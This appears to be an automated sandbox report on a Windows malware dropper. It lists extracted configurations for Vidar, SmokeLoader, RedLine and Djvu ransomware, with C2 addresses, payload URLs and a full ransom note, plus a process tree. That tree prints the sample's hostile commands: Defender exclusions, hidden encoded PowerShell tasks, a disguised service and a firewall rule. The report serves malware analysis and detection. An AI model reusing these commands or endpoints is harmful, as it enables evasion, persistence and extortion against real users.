Analysis

  • max time kernel
    155s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    13-03-2022 19:51

General

  • Target

    e5a2f1f92189919272d6a14bbd16934ee66464a6cb90f30f00abaf0a204e4307.exe

  • Size

    3.0MB

  • MD5

    21b5e506ed1c60114657b995b3b2d94c

  • SHA1

    c22aa703b30468ef291e78cfa0ffdf3ac8781f35

  • SHA256

    e5a2f1f92189919272d6a14bbd16934ee66464a6cb90f30f00abaf0a204e4307

  • SHA512

    5e1170f97d11a5a6213bdbe1788de61813bd2414b800e237d5e0ac55016e738b4c345f723ed6b7b9efb7e4d531d89b2134aa291107141b1cd9b4eb2c3d87650d

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ruzki000

C2

86.107.197.196:63065

Attributes
  • auth_value

    80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

pizzadlyashekera

C2

65.108.101.231:14648

Attributes
  • auth_value

    7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 42 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 11 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 27 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 31 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e5a2f1f92189919272d6a14bbd16934ee66464a6cb90f30f00abaf0a204e4307.exe
    "C:\Users\Admin\AppData\Local\Temp\e5a2f1f92189919272d6a14bbd16934ee66464a6cb90f30f00abaf0a204e4307.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_4.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3652
        • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_4.exe
          sahiba_4.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4584
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_7.exe
          sahiba_7.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2864
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3480
        • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_6.exe
          sahiba_6.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:5112
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:1336
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:5004
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_5.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3584
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_3.exe
          sahiba_3.exe
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:1688
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1032
            5⤵
            • Program crash
            PID:4428
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4640
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_1.exe
          sahiba_1.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4840
          • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_1.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_1.exe" -a
            5⤵
            • Executes dropped EXE
            PID:5024
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 628
        3⤵
        • Program crash
        PID:5084
  • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_5.exe
    sahiba_5.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4620
    • C:\Users\Admin\Documents\xfxEK7oCATxZuL6xKyBwvWEc.exe
      "C:\Users\Admin\Documents\xfxEK7oCATxZuL6xKyBwvWEc.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      PID:3648
      • C:\Users\Admin\AppData\Roaming\program5214\program5214.exe
        "C:\Users\Admin\AppData\Roaming\program5214\program5214.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4748
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 2196
          4⤵
          • Program crash
          PID:1336
    • C:\Users\Admin\Documents\xOUF0qo4BTbMDbvyoQoTwng_.exe
      "C:\Users\Admin\Documents\xOUF0qo4BTbMDbvyoQoTwng_.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      PID:4944
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 624
        3⤵
        • Program crash
        PID:448
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 632
        3⤵
        • Program crash
        PID:2804
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 632
        3⤵
        • Program crash
        PID:3944
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 656
        3⤵
        • Program crash
        PID:4968
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1260
        3⤵
        • Program crash
        PID:5084
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1268
        3⤵
        • Program crash
        PID:1336
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1312
        3⤵
        • Program crash
        PID:3672
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1280
        3⤵
        • Program crash
        PID:4208
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im "xOUF0qo4BTbMDbvyoQoTwng_.exe" /f & erase "C:\Users\Admin\Documents\xOUF0qo4BTbMDbvyoQoTwng_.exe" & exit
        3⤵
          PID:4556
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im "xOUF0qo4BTbMDbvyoQoTwng_.exe" /f
            4⤵
            • Kills process with taskkill
            PID:4952
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1268
          3⤵
          • Program crash
          PID:4896
      • C:\Users\Admin\Documents\z00bWPC04MsgIpHoqxDOSRJP.exe
        "C:\Users\Admin\Documents\z00bWPC04MsgIpHoqxDOSRJP.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of AdjustPrivilegeToken
        PID:3388
        • C:\Users\Admin\AppData\Local\Temp\1763a081-3d9a-4deb-a9bd-0e0a9ae7c2a6.exe
          "C:\Users\Admin\AppData\Local\Temp\1763a081-3d9a-4deb-a9bd-0e0a9ae7c2a6.exe"
          3⤵
          • Executes dropped EXE
          • Checks processor information in registry
          PID:1080
      • C:\Users\Admin\Documents\m5nGFrFgr1PdDihAMnmdmdGb.exe
        "C:\Users\Admin\Documents\m5nGFrFgr1PdDihAMnmdmdGb.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Checks processor information in registry
        PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im m5nGFrFgr1PdDihAMnmdmdGb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\m5nGFrFgr1PdDihAMnmdmdGb.exe" & del C:\ProgramData\*.dll & exit
          3⤵
            PID:3692
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              4⤵
              • Executes dropped EXE
              PID:3384
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im m5nGFrFgr1PdDihAMnmdmdGb.exe /f
              4⤵
              • Kills process with taskkill
              PID:3996
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 6
              4⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Suspicious use of SetThreadContext
              • Delays execution with timeout.exe
              PID:220
        • C:\Users\Admin\Documents\tGEvJeI0y8u2KNL5YPZVMmhL.exe
          "C:\Users\Admin\Documents\tGEvJeI0y8u2KNL5YPZVMmhL.exe"
          2⤵
            PID:2328
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              3⤵
                PID:4596
            • C:\Users\Admin\Documents\424TPgLsQ4CAwCC67CSfqlWp.exe
              "C:\Users\Admin\Documents\424TPgLsQ4CAwCC67CSfqlWp.exe"
              2⤵
                PID:2444
              • C:\Users\Admin\Documents\PS5dOsfKIhFQ3GyaDrLK00KO.exe
                "C:\Users\Admin\Documents\PS5dOsfKIhFQ3GyaDrLK00KO.exe"
                2⤵
                • Executes dropped EXE
                PID:1372
                • C:\Users\Admin\AppData\Local\Temp\7zSC755.tmp\Install.exe
                  .\Install.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4516
                  • C:\Users\Admin\AppData\Local\Temp\7zSE3C6.tmp\Install.exe
                    .\Install.exe /S /site_id "525403"
                    4⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks computer location settings
                    • Drops file in System32 directory
                    • Enumerates system info in registry
                    PID:3968
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                      5⤵
                        PID:2264
                        • C:\Windows\SysWOW64\cmd.exe
                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                          6⤵
                            PID:3612
                            • \??\c:\windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                              7⤵
                                PID:4952
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                7⤵
                                  PID:1096
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                              5⤵
                                PID:2648
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of SetThreadContext
                                  PID:2328
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2100
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                    7⤵
                                      PID:5024
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gPcmzyyDx" /SC once /ST 03:46:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  5⤵
                                  • Creates scheduled task(s)
                                  PID:2360
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gPcmzyyDx"
                                  5⤵
                                    PID:972
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4596
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gPcmzyyDx"
                                    5⤵
                                      PID:4192
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 19:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\vfLjJHM.exe\" j6 /site_id 525403 /S" /V1 /F
                                      5⤵
                                      • Drops file in Windows directory
                                      • Creates scheduled task(s)
                                      PID:792
                              • C:\Users\Admin\Documents\AjRYd1kDyuxhbufWmWYoG71B.exe
                                "C:\Users\Admin\Documents\AjRYd1kDyuxhbufWmWYoG71B.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of SetThreadContext
                                PID:4580
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                  3⤵
                                    PID:4736
                                • C:\Users\Admin\Documents\vt7u0eGrT5_iu6HF07q0blTH.exe
                                  "C:\Users\Admin\Documents\vt7u0eGrT5_iu6HF07q0blTH.exe"
                                  2⤵
                                    PID:2100
                                  • C:\Users\Admin\Documents\W0OA1a2rtpwEXqqA7jvPsqbq.exe
                                    "C:\Users\Admin\Documents\W0OA1a2rtpwEXqqA7jvPsqbq.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:4332
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 444
                                      3⤵
                                      • Program crash
                                      PID:3724
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 452
                                      3⤵
                                      • Program crash
                                      PID:1856
                                  • C:\Users\Admin\Documents\sNN8yb4aLHKNuWtrUNrqIWBp.exe
                                    "C:\Users\Admin\Documents\sNN8yb4aLHKNuWtrUNrqIWBp.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of SetThreadContext
                                    PID:1176
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                      3⤵
                                        PID:3412
                                    • C:\Users\Admin\Documents\VxQtn1dSdcPaG7CkWdmm1mlg.exe
                                      "C:\Users\Admin\Documents\VxQtn1dSdcPaG7CkWdmm1mlg.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2096
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 900
                                        3⤵
                                        • Program crash
                                        PID:4904
                                    • C:\Users\Admin\Documents\OKzobnvLnmEbjvk48d0ncqia.exe
                                      "C:\Users\Admin\Documents\OKzobnvLnmEbjvk48d0ncqia.exe"
                                      2⤵
                                        PID:220
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3284
                                      • C:\Users\Admin\Documents\tb60McQkeprqp6mB8xbN8gAf.exe
                                        "C:\Users\Admin\Documents\tb60McQkeprqp6mB8xbN8gAf.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:3160
                                        • C:\Users\Admin\Documents\tb60McQkeprqp6mB8xbN8gAf.exe
                                          "C:\Users\Admin\Documents\tb60McQkeprqp6mB8xbN8gAf.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2260
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 536
                                            4⤵
                                            • Program crash
                                            PID:3836
                                      • C:\Users\Admin\Documents\V0YDzxaeQyLVcKJjaycvsgQN.exe
                                        "C:\Users\Admin\Documents\V0YDzxaeQyLVcKJjaycvsgQN.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2236
                                      • C:\Users\Admin\Documents\xbtzNdRx0TisHRdtxTce7ifk.exe
                                        "C:\Users\Admin\Documents\xbtzNdRx0TisHRdtxTce7ifk.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of SetThreadContext
                                        PID:520
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                          3⤵
                                            PID:4896
                                        • C:\Users\Admin\Documents\t8gkAd4lidOE2Kc8wQw0HCr_.exe
                                          "C:\Users\Admin\Documents\t8gkAd4lidOE2Kc8wQw0HCr_.exe"
                                          2⤵
                                            PID:3384
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hvhtovyy\
                                              3⤵
                                                PID:1960
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lgvrlnlg.exe" C:\Windows\SysWOW64\hvhtovyy\
                                                3⤵
                                                  PID:3696
                                                • C:\Windows\SysWOW64\sc.exe
                                                  "C:\Windows\System32\sc.exe" create hvhtovyy binPath= "C:\Windows\SysWOW64\hvhtovyy\lgvrlnlg.exe /d\"C:\Users\Admin\Documents\t8gkAd4lidOE2Kc8wQw0HCr_.exe\"" type= own start= auto DisplayName= "wifi support"
                                                  3⤵
                                                    PID:4300
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    "C:\Windows\System32\sc.exe" description hvhtovyy "wifi internet conection"
                                                    3⤵
                                                      PID:1572
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:2444
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      "C:\Windows\System32\sc.exe" start hvhtovyy
                                                      3⤵
                                                        PID:1648
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                        3⤵
                                                          PID:2524
                                                      • C:\Users\Admin\Documents\GhYbxrbtMfIqkEwC6G9u9jsn.exe
                                                        "C:\Users\Admin\Documents\GhYbxrbtMfIqkEwC6G9u9jsn.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        • Adds Run key to start application
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4660
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c timeout 45
                                                          3⤵
                                                            PID:1704
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout 45
                                                              4⤵
                                                              • Delays execution with timeout.exe
                                                              PID:4904
                                                          • C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:2744
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            3⤵
